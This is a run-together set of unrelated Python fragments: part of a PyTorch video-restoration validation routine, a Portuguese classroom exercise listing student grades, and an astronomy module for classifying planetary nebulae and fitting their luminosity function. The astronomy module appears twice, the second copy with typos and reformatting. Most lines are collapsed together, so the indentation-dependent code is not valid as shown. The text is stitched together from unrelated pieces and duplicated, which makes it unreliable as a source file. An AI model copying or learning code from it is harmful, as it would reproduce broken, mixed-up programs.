in range(world_size): pbar.update(1) pbar.set_description(f'Folder: {folder}') if rank == 0: pbar.close() if with_metrics: if self.opt['dist']: # collect data among GPUs for _, tensor in self.metric_results.items(): dist.reduce(tensor, 0) dist.barrier() if rank == 0: self._log_validation_metric_values(current_iter, dataset_name, tb_logger) def test(self): n = self.lq.size(1) self.net_g.eval() flip_seq = self.opt['val'].get('flip_seq', False) self.center_frame_only = self.opt['val'].get('center_frame_only', False) if flip_seq: self.lq = torch.cat([self.lq, self.lq.flip(1)], dim=1) with torch.no_grad(): self.output = self.net_g(self.lq) if flip_seq: output_1 = self.output[:, :n, :, :, :] output_2 = self.output[:, n:, :, :, :].flip(1) self.output = 0.5 * (output_1 + output_2) if self.center_frame_only: self.output = self.output[:, n // 2, :, :, :] self.net_g.train()
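# --- Hedged sketch (illustration only; numbers are invented) ---
# Why dist_validation pads the folder count: every rank must run the same number
# of iterations, otherwise the collective ops (dist.reduce / dist.barrier)
# deadlock. Ranks that run past the end re-evaluate the last folder (the index
# is clamped) and those duplicate results are simply never recorded.
def _demo_rank_assignment(num_folders=10, world_size=4):
    num_pad = (world_size - (num_folders % world_size)) % world_size  # -> 2
    return {rank: [min(i, num_folders - 1)
                   for i in range(rank, num_folders + num_pad, world_size)]
            for rank in range(world_size)}  # every rank gets exactly 3 indices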
ficha = list() while True: nome = str(input('Nome: ')) nota1 = float(input('Nota 01: ')) nota2 = float(input('Nota 02: ')) media = (nota1 + nota2) / 2 ficha.append([nome, nota1, nota2, media]) resp = str(input('Quer continuar? (S/N) ')) if resp in 'Nn': break print('-=' * 30) print(f'{"No.":<4}{"Nome":<10}{"MEDIA":>8}') print('-' * 26) for i, a in enumerate(ficha): print(f'{i:<4}{a[0]:<10}{a[3]:>8.1f}') # a[3] is the media; a[2] would print nota2 while True: print('-=' * 35) opc = int(input('Mostrar notas de qual aluno? (999 interrompe): ')) if opc == 999: print('Finalizando...') break if opc <= len(ficha) - 1: print(f'Notas de {ficha[opc][0]} são {ficha[opc][1]} e {ficha[opc][2]}') print('<<< VOLTE SEMPRE >>>')
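# --- Hedged note (illustration only, not part of the exercise) ---
# The table header above relies on f-string format specs: `<` left-aligns,
# `>` right-aligns, the integer is the field width, and `.1f` keeps one decimal:
# f'{0:<4}{"Ana":<10}{7.5:>8.1f}' -> '0   Ana            7.5'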
import logging # use instead of print for more control from pathlib import Path # filesystem related stuff import numpy as np # numerical computations from matplotlib.pyplot import subplots, figure, savefig import matplotlib.pyplot as plt from astropy.stats import sigma_clipped_stats # calculate statistics of images from astropy.table import Table from scipy.optimize import minimize from scipy.integrate import quad from inspect import signature from .constants import single_column,two_column,tab10 from .old import MaximumLikelihood logger = logging.getLogger(__name__) def emission_line_diagnostics(table,distance_modulus,completeness_limit,distance_modulus_err=0.1,detection_limit=5): '''Classify objects based on their emission lines we use four criteria to distinguish between PN, HII regions and SNR: criteria1 -> empirical upper limit (currently not used) 4 > log10 [OIII] / (Ha +[NII]) criteria2 -> HII regions log10 [OIII] / (Ha +[NII]) > -0.37 M[OIII] - 1.16 criteria3 -> SNR Ha / [SII] < 2.5 criteria4 -> velocity dispersion The second criterion requires the absolute magnitude of the objects. Therefore the distance_modulus is needed as an input to this function Parameters ---------- table : Astropy Table Table with measured fluxes completeness_limit : float Sources fainter than this magnitude are ignored distance_modulus : float A first guess of the distance modulus (used for diagnostics) distance_modulus = m - M detection_limit : float how many sigma are needed for a detection (default=5). Non detections are set to detection_limit*uncertainty. Returns ------- table : Astropy Table The input table with an additional column, indicating the type of the object ''' # we don't want to modify the original input table table = table.copy() logger.info(f'{len(table)} entries in initial catalogue') logger.info(f'using mu={distance_modulus:.2f}, cl={completeness_limit}') # make sure that the new column can save strings with 3 characters # we start with the assumption that all sources are PN and remove contaminants later table['type'] = np.empty(len(table),dtype='U3') table['type'][:] = 'PN' # calculate the absolute magnitude based on a first estimate of the distance modulus table['MOIII'] = table['mOIII'] - distance_modulus table['dMOIII'] = np.sqrt(table['dmOIII']**2 + distance_modulus_err**2) # we need the sum of the [SII] lines for the SNR criteria table['SII_flux'] = table['SII6716_flux']+table['SII6730_flux'] table['SII_flux_err'] = np.sqrt(table['SII6716_flux_err']**2+table['SII6730_flux_err']**2) # we set negative fluxes and non-detections to the error (0 would cause errors because we work with ratios) for col in ['HB4861','OIII5006','HA6562','NII6583','SII']: detection = (table[f'{col}_flux']>0) & (table[f'{col}_flux']>detection_limit*table[f'{col}_flux_err']) table[f'{col}_flux'][np.where(~detection)] = table[f'{col}_flux_err'][np.where(~detection)] table[f'{col}_detection'] = detection # calculate velocity dispersion (use line with best signal to noise) table['OIII5006_S/N'] = table['OIII5006_flux']/table['OIII5006_flux_err'] table['HA6562_S/N'] = table['HA6562_flux']/table['HA6562_flux_err'] table['SII_S/N'] = table['SII_flux']/table['SII_flux_err'] # we use the Halpha velocity dispersion.
the others can behave funny table['v_SIGMA'] = table['HA6562_SIGMA'] table['v_SIGMA_S/N'] = table['HA6562_S/N'] #table['v_SIGMA'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['HA6562_SIGMA'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA_S/N'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['HA6562_S/N'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'])] = table['SII6716_SIGMA'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA_S/N'][table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['SII_S/N'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #logger.info('v_sigma: mean={:.2f}, median={:.2f}, sig={:.2f}'.format(*sigma_clipped_stats(table['v_SIGMA'][~np.isnan(table['v_SIGMA'])]))) # define ratio of OIII to Halpha and NII for the first criterion (with error). If NII is not detected we assume NII=0.5Halpha table['logR'] = np.log10(table['OIII5006_flux'] / (table['HA6562_flux']+table['NII6583_flux'])) table['logR'][~table['NII6583_detection']] = np.log10(table['OIII5006_flux'][~table['NII6583_detection']] / (1.5*table['HA6562_flux'][~table['NII6583_detection']])) table['dlogR'] = np.sqrt((table['OIII5006_flux_err'] / table['OIII5006_flux'])**2 + (table['HA6562_flux_err'] / (table['HA6562_flux']+table['NII6583_flux']))**2 + (table['NII6583_flux_err'] / (table['HA6562_flux']+table['NII6583_flux']))**2) /np.log(10) # define criteria to exclude non PN objects criteria = {} if True: # this criterion should be log(4) which would remove a lot of objects.
no idea why so many objects have such high line ratios #criteria[''] = (np.log10(4) < (table['R'])) #& (table['HA6562_detection']) criteria['HII'] = (table['logR'] < -0.37*(table['MOIII']+table['dMOIII']) - 1.16) & (table['HA6562_detection']) criteria['SNR'] = (table['HA6562_flux']/table['SII_flux'] < 2.5) & (table['SII_detection']) elif True: # here we retain things in the sample if they are within 1 sigma #criteria[''] = (4 < (table['R']- 3*table['dR'])) #& (table['HA6562_detection']) criteria['HII'] = (table['logR'] + table['dlogR'] < -0.37*(table['MOIII']+table['dmOIII']) - 1.16) #& (table['HA6562_detection'] | table['NII6583_detection']) HAoverSII = table['HA6562_flux']/table['SII_flux'] HAoverSII_err = HAoverSII * np.sqrt((table['HA6562_flux_err']/table['HA6562_flux'])**2 + (table['SII_flux_err']/table['SII_flux'])**2) criteria['SNR'] = ((HAoverSII + HAoverSII_err) < 2.5) else: # use HB as a criterion (because this line is close to OIII, extinction should not be an issue) criteria['HII'] = (np.log10(table['OIII5006'] / table['HB4861']) < -0.37*table['MOIII'] - 0.71) & table['HB4861_detection'] #criteria['SNR'] |= (table['v_SIGMA']>100) & table['SII_detection'] # objects that would be classified as PN by narrowband observations table['SNRorPN'] = criteria['SNR'] & ~criteria['HII'] for k in criteria.keys(): table['type'][np.where(criteria[k])] = k # remove rows with NaN values in some columns mask = np.ones(len(table), dtype=bool) for col in ['HB4861_flux','OIII5006_flux','HA6562_flux','NII6583_flux','SII_flux']: mask &= ~np.isnan(table[col]) table['type'][np.where(~mask)] = 'NaN' # purely for information mask = table['mOIII']< completeness_limit logger.info(f'{np.sum(~mask)} objects below the completeness limit of {completeness_limit}') logger.info(f'{len(table[table["type"]==""])} objects classified as 4<log [OIII]/Ha') logger.info(f'{len(table[table["type"]=="HII"])} ({len(table[(table["type"]=="HII") & (table["mOIII"]<completeness_limit)])}) objects classified as HII') logger.info(f'{len(table[table["type"]=="SNR"])} ({len(table[(table["type"]=="SNR") & (table["mOIII"]<completeness_limit)])}) objects classified as SNR') logger.info(f'{len(table[table["type"]=="PN"])} ({len(table[(table["type"]=="PN") & (table["mOIII"]<completeness_limit)])}) objects classified as PN') return table def gaussian(x,mu,sig): return 1/np.sqrt(2*np.pi*sig**2) * np.exp(-(x-mu)**2/(2*sig**2)) class MaximumLikelihood1D: ''' for uncertainties https://erikbern.com/2018/10/08/the-hackers-guide-to-uncertainty-estimates.html Parameters ---------- func : function PDF of the form `func(data,params)`. `func` must accept a ndarray for `data` and can have any number of additional parameters (at least one). data : ndarray Measured data that are fed into `func`. err : ndarray Error associated with data. prior : function Prior probabilities for the parameters of func. method : algorithm that is used for the minimization. **kwargs additional fixed keyword arguments that are passed to func.
''' def __init__(self,func,data,err=None,prior=None,method='Nelder-Mead',**kwargs): #if len(signature(func).parameters)-len(kwargs)!=2: # raise ValueError(f'`func` must have at least one free argument') self.func = func logger.info(f'initialize fitter with {len(data)} data points') self.data = data self.err = err if prior: self.prior = prior self.method = method self.kwargs = kwargs width = 5 size = 1000 idx_low = np.argmin(self.data) idx_high = np.argmax(self.data) if np.any(err): self.grid = np.linspace(self.data[idx_low]-width*self.err[idx_low],self.data[idx_high]+width*self.err[idx_high],size) def prior(self,*args): '''uniform prior''' return 1/len(self.data) def evidence(self,param): '''the evidence is the likelihood of observing the data given the parameter''' # real integration takes way too long #return -np.sum(np.log([quad(lambda x: self.func(x,param,**self.kwargs)*gaussian(x,d,e),d-5*e,d+5*e)[0] for d,e in zip(self.data,self.err)])) if np.any(self.err): ev = [np.trapz(self.func(self.grid,param,**self.kwargs)*gaussian(self.grid,d,e),self.grid) for d,e in zip(self.data,self.err)] return np.sum(np.log(ev)) else: ev = self.func(self.data,param,**self.kwargs) return np.sum(np.log(ev)) def likelihood(self,param): '''the evidence multiplied by some prior''' return -self.evidence(param) - np.log(self.prior(param)) def fit(self,guess): '''use scipy minimize to find the best parameters''' #logger.info(f'searching for best parameters with {len(self.data)} data points') self.result = minimize(self.likelihood,guess,method=self.method) self.x = self.result.x[0] if not self.result.success: raise RuntimeError('fit was not successful') #for name,_x,_dx in zip(list(signature(self.func).parameters)[1:],self.x,self.dx): # print(f'{name} = {_x:.3f} + {_dx[1]:.3f} - {_dx[0]:.3f} ') size = 0.5 self.x_arr = np.linspace(self.x-size,self.x+size,1000) # evidence and likelihood are in log self.evidence_arr = np.exp([self.evidence(_) for _ in self.x_arr]) self.prior_arr = np.array([self.prior(_) for _ in self.x_arr]) self.likelihood_arr = np.exp([-self.likelihood(_) for _ in self.x_arr]) valid = ~np.isnan(self.evidence_arr) & ~np.isnan(self.likelihood_arr) self.evidence_arr /= np.abs(np.trapz(self.evidence_arr[valid],self.x_arr[valid])) self.prior_arr /= np.abs(np.trapz(self.prior_arr[valid],self.x_arr[valid])) self.likelihood_arr /= np.abs(np.trapz(self.likelihood_arr[valid],self.x_arr[valid])) normalization = np.trapz(self.likelihood_arr,self.x_arr) self.integral = np.array([np.trapz(self.likelihood_arr[self.x_arr<=xp],self.x_arr[self.x_arr<=xp])/normalization for xp in self.x_arr[1:]]) # 1 sigma interval for cumulative likelihood self.mid = np.argmin(np.abs(self.integral-0.5)) self.high = np.argmin(np.abs(self.integral-0.8415)) self.low = np.argmin(np.abs(self.integral-0.1585)) self.plus = self.x_arr[self.high]-self.x self.minus = self.x-self.x_arr[self.low] #logger.info(f'{self.x:.3f}+{self.plus:.3f}-{self.minus:.3f}') return self.x,self.plus,self.minus def bootstrap(self,guess,N_boot=100): '''use bootstrapping to estimate the uncertainties''' loglike = lambda param,data: -np.sum(np.log(self.func(data,param,**self.kwargs))) result_bootstrap = np.zeros((N_boot)) for i in range(N_boot): sample = np.random.choice(self.data,len(self.data)) result_bootstrap[i] = minimize(loglike,guess,args=(sample),method=self.method).x[0] return np.mean(result_bootstrap),np.std(result_bootstrap) def plot(self,limits=[]): '''plot the likelihood plot the evidence, prior and likelihood for the given data over some
parameter space. ''' if not hasattr(self,'x'): logger.warning('run fit function first. I do it for you this time.') x,dp,dm=self.fit(28) else: x,dp,dm = self.x,self.plus,self.minus fig, (ax1,ax2) = subplots(nrows=2,ncols=1,figsize=(single_column,single_column),sharex=True) #fig = figure(figsize=(single_column,single_column)) #ax1 = fig.add_subplot(2,1,1) #ax2 = fig.add_subplot(2,1,2,sharex=ax1) ax1.tick_params(labelbottom=False) ax1.plot(self.x_arr,self.prior_arr,label='prior',color=tab10[1]) ax1.plot(self.x_arr,self.evidence_arr,label='evidence',color=tab10[0]) l = ax1.plot(self.x_arr,self.likelihood_arr,label='likelihood',color=tab10[2]) ax1.axvline(self.x,ls='--',c='k',lw=0.5) ax1.axvline(self.x_arr[self.low],ls='--',c='k',lw=0.5) ax1.axvline(self.x_arr[self.high],ls='--',c='k',lw=0.5) ax1.set_ylabel('likelihood') ax2.plot(self.x_arr[1:],self.integral,label='cumulative likelihood',color=tab10[2]) ax2.axvline(self.x,ls='--',c='k',lw=0.5) ax2.axhline(0.5,ls='--',c='k',lw=0.5) ax2.axhline(0.5+0.683/2,ls='--',c='k',lw=0.5) ax2.axhline(0.5-0.683/2,ls='--',c='k',lw=0.5) ax2.axvline(self.x_arr[self.low],ls='--',c='k',lw=0.5) ax2.axvline(self.x_arr[self.high],ls='--',c='k',lw=0.5) ax1.legend() ax2.set_xlabel(r'$(m-M)$ / mag') ax2.set_ylabel('cumulative likelihood') if limits: ax1.set(xlim=limits) ax2.set(xlim=limits) ax1.set_title(f'{self.x:.3f}+{dp:.3f}-{dm:.3f}') ax1.annotate(f'{len(self.data)} data points',(0.02,0.87),xycoords='axes fraction',fontsize=8) plt.subplots_adjust(hspace = .001) return fig def __call__(self,guess): '''use scipy minimize to find the best parameters''' return self.fit(guess) def f(m,mu,Mmax=-4.47): '''luminosity function (=density)''' return np.exp(0.307*(m-mu)) * (1-np.exp(3*(Mmax-m+mu))) def F(m,mu,Mmax=-4.47): '''indefinite integral of the luminosity function''' #return np.exp(-0.307*mu) * (np.exp(0.307*m)/0.307 + np.exp(3*(Mmax-mu)-2.693*m) / 2.693) return np.exp(0.307*(m-mu))/0.307 + np.exp(2.693*(mu-m)+3*Mmax)/2.693 def pnlf(m,mu,mhigh,Mmax=-4.47): '''Planetary Nebula Luminosity Function (PNLF) N(m) ~ e^0.307(m-mu) * (1-e^3(Mmax-m+mu)) The normalization is calculated by integrating from Mmax+mu (the root of the function) to the specified completeness. Objects that lie outside this interval are ignored. Parameters ---------- m : ndarray apparent magnitudes of the PNs mu : float distance modulus mhigh : float completeness level (magnitude of the faintest sources that are consistently detected). Required for normalization. ''' m = np.atleast_1d(m) mlow = Mmax+mu normalization = 1/(F(mhigh,mu) - F(mlow,mu)) out = normalization * np.exp(0.307*(m-mu)) * (1-np.exp(3*(Mmax-m+mu))) out[(m>mhigh) | (m<mlow)] = 0 return out def PNLF(bins,mu,mhigh,Mmax=-4.47): '''integrated Planetary Nebula Luminosity Function Parameters ---------- bins : ndarray Defines a monotonically increasing array of bin edges. mu : float Distance modulus mhigh : float completeness level (magnitude of the faintest sources that are consistently detected). Required for normalization. Mmax : float Magnitude of the brightest PN.
''' mlow = mu+Mmax lower = bins[:-1] upper = bins[1:] normalization = 1/(F(mhigh,mu,Mmax=Mmax)-F(mlow,mu,Mmax=Mmax)) #out = normalization * (np.exp(2.693*mu + 3.*Mmax) * (-0.371333/np.exp(2.693*lower)) + 0.371333/np.exp(2.693*upper)) + (-3.25733*np.exp(0.307*lower) + 3.25733*np.exp(0.307*upper))/np.exp(0.307*mu) out = normalization * (F(upper,mu,Mmax=Mmax) - F(lower,mu,Mmax=Mmax)) out[out<0] = 0 return out def cdf(x,mu,mhigh,Mmax = -4.47): '''Cumulative distribution function for PNe''' mlow = mu+Mmax normalization = 1/(F(mhigh,mu,Mmax=Mmax)-F(mlow,mu,Mmax=Mmax)) out = normalization * (F(x,mu,Mmax=Mmax) - F(mlow,mu,Mmax=Mmax)) out[x<mlow] = 0 out[x>mhigh] = 1 return out def sample_pnlf(size,mu,cl): Nbins = 1000 x = np.linspace(mu-4.47,cl,Nbins) cdf = np.cumsum(pnlf(x,mu,cl))*(cl-mu+4.47)/Nbins u = np.random.uniform(size=size) return np.interp(u,cdf,x) ''' from scipy.stats import ks_2samp from pnlf.analyse import sample_pnlf sampled_data = sample_pnlf(10000,galaxy.mu,galaxy.completeness_limit) ks,pv = ks_2samp(data,sampled_data) print(f'statistic={ks:.3f}, pvalue={pv:.3f}') ''' def prior(mu): mu0 = 29.91 std = 0.13 return 1 / (std*np.sqrt(2*np.pi)) * np.exp(-(mu-mu0)**2 / (2*std**2)) def N25(mu,completeness,data,deltaM): '''calculate the number of PN within deltaM the cutoff of the luminosity function is at mu-4.47. Step1: number of PN in data between cutoff and completeness Step2: calculate same number from theoretical function Step3: calculate theoretical number between cutoff and deltaM Step4: Scale number from Step1 with results from Step 2 and 3 Parameters ---------- mu : float distance modulus completeness : float completeness limit (upper limit for PNLF). Used for normalization data : ndarray array of magnitudes deltaM : float Interval above the cutoff ''' cutoff = mu - 4.47 N_total = len(data[data<completeness]) p_deltaM = (F(cutoff+deltaM,mu) - F(cutoff,mu)) / (F(completeness,mu) - F(cutoff,mu)) return N_total * p_deltaM def estimate_uncertainties_from_SII(tbl,plot=False): ''' The uncertainties in the PHANGS-MUSE DAP products are somewhat underestimated. To get a better handle on the errors, we use that the SII6716/SII6730 ratio should theoretically be 1.4484. Any deviation from this value can be attributed to the errors in the measurements. We divide the deviation by the error of the ratio. This should follow a gaussian with width 1. From the actual width of the distribution we can estimate the real uncertainty of the data.
to use Francesco's catalogue instead: ``` with fits.open(data_ext/'Products'/'Nebulae catalogue' / 'Nebulae_catalogue_v2.fits') as hdul: nebulae = Table(hdul[1].data) nebulae['gal_name'][nebulae['gal_name']=='NGC628'] = 'NGC0628' nebulae = nebulae[(nebulae["flag_edge"] == 0) & (nebulae["flag_star"] == 0) & (nebulae["BPT_NII"] == 0) & (nebulae["BPT_SII"] == 0) & (nebulae["BPT_OI"] == 0) & (nebulae['HA6562_SIGMA'] < 100)] nebulae.rename_columns(['SII6730_FLUX','SII6730_FLUX_ERR','SII6716_FLUX','SII6716_FLUX_ERR'],['SII6730','SII6730_err','SII6716','SII6716_err']) nebulae['type'] = 'HII' ``` ''' if tbl is None: from astropy.io import fits with fits.open(Path('a:') /'MUSE_DR2' /'Nebulae catalogue' / 'Nebulae_Catalogue_DR2_native.fits') as hdul: tbl = Table(hdul[1].data) tbl['gal_name'][tbl['gal_name']=='NGC628'] = 'NGC0628' tbl = tbl[(tbl["flag_edge"] == 0) & (tbl["flag_star"] == 0) & (tbl["BPT_NII"] == 0) & (tbl["BPT_SII"] == 0) & (tbl["BPT_OI"] == 0) & (tbl['HA6562_SIGMA'] < 100)] tbl.rename_columns(['SII6730_FLUX','SII6730_FLUX_ERR','SII6716_FLUX','SII6716_FLUX_ERR'],['SII6730','SII6730_err','SII6716','SII6716_err']) tbl['type'] = 'HII' tmp = tbl[(tbl['type']=='HII') & (tbl['SII6730']>0) & (tbl['SII6716']>0)] logger.info(f'sample contains {len(tmp)} nebulae') ratio = tmp['SII6716'] / tmp['SII6730'] ratio_err = ratio * np.sqrt((tmp['SII6716_err']/tmp['SII6716'])**2+(tmp['SII6730_err']/tmp['SII6730'])**2) diff_norm = (ratio-1.4484) / ratio_err diff_norm = diff_norm[diff_norm>0] gauss = lambda x,mu,std: 1/np.sqrt(2* np.pi*std**2) * np.exp(-0.5 * ((x - mu) / std)**2) log_likelihood = lambda std,x: - np.sum(np.log(gauss(x,0,std))) std = minimize(log_likelihood,[1],args=(diff_norm,)).x[0] if plot: fig, ax = plt.subplots(figsize=(4,3)) hist, bins, patches = ax.hist((ratio-1.4484) / ratio_err,bins=20,range=(0,6),color='silver') y2 = gauss(bins,0,1) ax.plot(bins,hist[0]/y2[0]*y2, '--',label='std=1',color='tab:blue') y = gauss(bins,0,std) ax.plot(bins,hist[0]/y[0]*y, '--',label=f'std={std:.2f}',color='tab:red') ax.legend() ax.set(xlabel="Deviation / Error",ylabel="Number of regions",yscale='log',ylim=[1,1.5*hist[0]]) plt.show() logger.info(f'std={std:.3f}') return std
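# --- Hedged sanity check (illustration only; mu and mhigh values are invented) ---
# pnlf() is normalised on [mu + Mmax, mhigh], so it should integrate to ~1 there,
# and cdf() should run from 0 to 1 over the same interval.
if __name__ == '__main__':
    mu, mhigh = 29.9, 28.0
    m = np.linspace(mu - 4.47, mhigh, 2000)
    print(np.trapz(pnlf(m, mu, mhigh), m))               # ~ 1.0
    print(cdf(np.array([mu - 4.47, mhigh]), mu, mhigh))  # ~ [0., 1.]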
import logging # use instead of print for more control from pathlib import Path # filesystem related stuff import numpy as np # numerical computations from matplotlib.pyplot import subplots, figure, savefig import matplotlib.pyplot as plt from astropy.stats import sigma_clipped_stats # calcualte statistics of images from astropy.table import Table from scipy.optimize import minimize from scipy.integrate import quad from inspect import signature from .constants import single_column,two_column,tab10 from .old import MaximumLikelihood logger = logging.getLogger(__name__) def emission_line_diagnostics(table,distance_modulus,completeness_limit,distance_modulus_err=0.1,detection_limit=5): '''Classify objects based on their emission lines we use four criteria to distinguish between PN, HII regions and SNR: criteria1 -> emperical upper limit (currently not used) 4 > log10 [OIII] / (Ha +[NII]) criteria2 -> HII regions log10 [OIII] / (Ha +[NII]) > -0.37 M[OIII] - 1.16 criteria3 -> SNR Ha / [SII] < 2.5 criteria4 -> velocity dispersion The second criteria requires the absolute magnitude of the objects. Therefor the distance_modulus is needed as an input to this function Parameters ---------- table : Astropy Table Table with measured fluxes completeness_limit : float Sources fainter than this magnitude are ignored distance_modulus : float A first guess of the distance modulus (used for diagnostics) distance_modulus = m - M detection_limit : float how many sigma are needed for a detection (default=3). Non detections are set to detection_limit*uncertainty. Returns ------- table : Astropy Table The input table with an additional column, indicating the type of the object ''' # we don't want to modift the original input table table = table.copy() logger.info(f'{len(table)} entries in initial catalogue') logger.info(f'using mu={distance_modulus:.2f}, cl={completeness_limit}') # make sure that the new column can save strings with 3 characters # we start with the assumption that all sources are PN and remove contaminants later table['type'] = np.empty(len(table),dtype='U3') table['type'][:] = 'PN' # calculate the absolute magnitude based on a first estimate of the distance modulus table['MOIII'] = table['mOIII'] - distance_modulus table['dMOIII'] = np.sqrt(table['dmOIII']**2 + distance_modulus_err**2) # we need the the sum of the [SII] lines for the SNR criteria table['SII_flux'] = table['SII6716_flux']+table['SII6730_flux'] table['SII_flux_err'] = np.sqrt(table['SII6716_flux_err']**2+table['SII6730_flux_err']**2) # we set negative fluxes and none detections to th error (0 would cause errors because we work with ratios) for col in ['HB4861','OIII5006','HA6562','NII6583','SII']: detection = (table[f'{col}_flux']>0) & (table[f'{col}_flux']>detection_limit*table[f'{col}_flux_err']) table[f'{col}_flux'][np.where(~detection)] = table[f'{col}_flux_err'][np.where(~detection)] table[f'{col}_detection'] = detection # calculate velocity dispersion (use line with best signal to noise) table['OIII5006_S/N'] = table['OIII5006_flux']/table['OIII5006_flux_err'] table['HA6562_S/N'] = table['HA6562_flux']/table['HA6562_flux_err'] table['SII_S/N'] = table['SII_flux']/table['SII_flux_err'] # we use the Halpha velocity dispersion. 
the others can behave funny table['v_SIGMA'] = table['HA6562_SIGMA'] table['v_SIGMA_S/N'] = table['HA6562_S/N'] #table['v_SIGMA'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['HA6562_SIGMA'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA_S/N'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['HA6562_S/N'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'])] = table['SII6716_SIGMA'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA_S/N'][table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['SII_S/N'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #logger.info('v_sigma: median={:.2f}, median={:.2f}, sig={:.2f}'.format(*sigma_clipped_stats(table['v_SIGMA'][~np.isnan(table['v_SIGMA'])]))) # define ratio of OIII to Halpha and NII for the first criteria (with error). If NII is not detected we assume NII=0.5Halpha table['logR'] = np.log10(table['OIII5006_flux'] / (table['HA6562_flux']+table['NII6583_flux'])) table['logR'][~table['NII6583_detection']] = np.log10(table['OIII5006_flux'][~table['NII6583_detection']] / (1.5*table['HA6562_flux'][~table['NII6583_detection']])) table['dlogR'] = np.sqrt((table['OIII5006_flux_err'] / table['OIII5006_flux'])**2 + (table['HA6562_flux_err'] / (table['HA6562_flux']+table['NII6583_flux']))**2 + (table['NII6583_flux_err'] / (table['HA6562_flux']+table['NII6583_flux']))**2) /np.log(10) # define criterias to exclude non PN objects criteria = {} if True: # this criteria should be log(4) which would remove a lot of objects. 

class MaximumLikelihood1D:
    '''maximum-likelihood fit of a one-parameter PDF

    For the treatment of the uncertainties see
    https://erikbern.com/2018/10/08/the-hackers-guide-to-uncertainty-estimates.html

    Parameters
    ----------
    func : function
        PDF of the form `func(data,params)`. `func` must accept a ndarray for
        `data` and can have any number of additional parameters (at least one).

    data : ndarray
        Measured data that are fed into `func`.

    err : ndarray
        Error associated with data.

    prior : function
        Prior probabilities for the parameters of func.

    method : str
        Algorithm that is used for the minimization.

    **kwargs
        Additional fixed keyword arguments that are passed to func.
    '''

    def __init__(self, func, data, err=None, prior=None, method='Nelder-Mead', **kwargs):
        #if len(signature(func).parameters)-len(kwargs) != 2:
        #    raise ValueError('`func` must have at least one free argument')
        self.func = func
        logger.info(f'initialize fitter with {len(data)} data points')
        self.data = data
        self.err = err
        if prior:
            self.prior = prior
        self.method = method
        self.kwargs = kwargs

        # grid for the numerical integration over the measurement errors
        width = 5
        size = 1000
        idx_low = np.argmin(self.data)
        idx_high = np.argmax(self.data)
        if self.err is not None and np.any(self.err):
            self.grid = np.linspace(self.data[idx_low]-width*self.err[idx_low],
                                    self.data[idx_high]+width*self.err[idx_high], size)

    def prior(self, *args):
        '''uniform prior'''
        return 1/len(self.data)

    def evidence(self, param):
        '''the evidence is the likelihood of observing the data given the parameter'''
        # real integration takes way too long
        #return -np.sum(np.log([quad(lambda x: self.func(x,param,**self.kwargs)*gaussian(x,d,e),d-5*e,d+5*e)[0] for d,e in zip(self.data,self.err)]))
        if self.err is not None and np.any(self.err):
            # marginalize over the measurement uncertainties on a fixed grid
            ev = [np.trapz(self.func(self.grid, param, **self.kwargs)*gaussian(self.grid, d, e), self.grid) for d, e in zip(self.data, self.err)]
            return np.sum(np.log(ev))
        else:
            ev = self.func(self.data, param, **self.kwargs)
            return np.sum(np.log(ev))

    def likelihood(self, param):
        '''negative log of the evidence multiplied with the prior'''
        return -self.evidence(param) - np.log(self.prior(param))

    def fit(self, guess):
        '''use scipy minimize to find the best parameters'''
        #logger.info(f'searching for best parameters with {len(self.data)} data points')
        self.result = minimize(self.likelihood, guess, method=self.method)
        self.x = self.result.x[0]
        if not self.result.success:
            raise RuntimeError('fit was not successful')
        #for name,_x,_dx in zip(list(signature(self.func).parameters)[1:],self.x,self.dx):
        #    print(f'{name} = {_x:.3f} + {_dx[1]:.3f} - {_dx[0]:.3f}')

        size = 0.5
        self.x_arr = np.linspace(self.x-size, self.x+size, 1000)
        # evidence and likelihood are in log
        self.evidence_arr = np.exp([self.evidence(_) for _ in self.x_arr])
        self.prior_arr = np.array([self.prior(_) for _ in self.x_arr])
        self.likelihood_arr = np.exp([-self.likelihood(_) for _ in self.x_arr])

        valid = ~np.isnan(self.evidence_arr) & ~np.isnan(self.likelihood_arr)
        self.evidence_arr /= np.abs(np.trapz(self.evidence_arr[valid], self.x_arr[valid]))
        self.prior_arr /= np.abs(np.trapz(self.prior_arr[valid], self.x_arr[valid]))
        self.likelihood_arr /= np.abs(np.trapz(self.likelihood_arr[valid], self.x_arr[valid]))

        normalization = np.trapz(self.likelihood_arr, self.x_arr)
        self.integral = np.array([np.trapz(self.likelihood_arr[self.x_arr<=xp], self.x_arr[self.x_arr<=xp])/normalization for xp in self.x_arr[1:]])

        # 1 sigma interval from the cumulative likelihood
        self.mid = np.argmin(np.abs(self.integral-0.5))
        self.high = np.argmin(np.abs(self.integral-0.8415))
        self.low = np.argmin(np.abs(self.integral-0.1585))
        self.plus = self.x_arr[self.high] - self.x
        self.minus = self.x - self.x_arr[self.low]
        #logger.info(f'{self.x:.3f}+{self.plus:.3f}-{self.minus:.3f}')

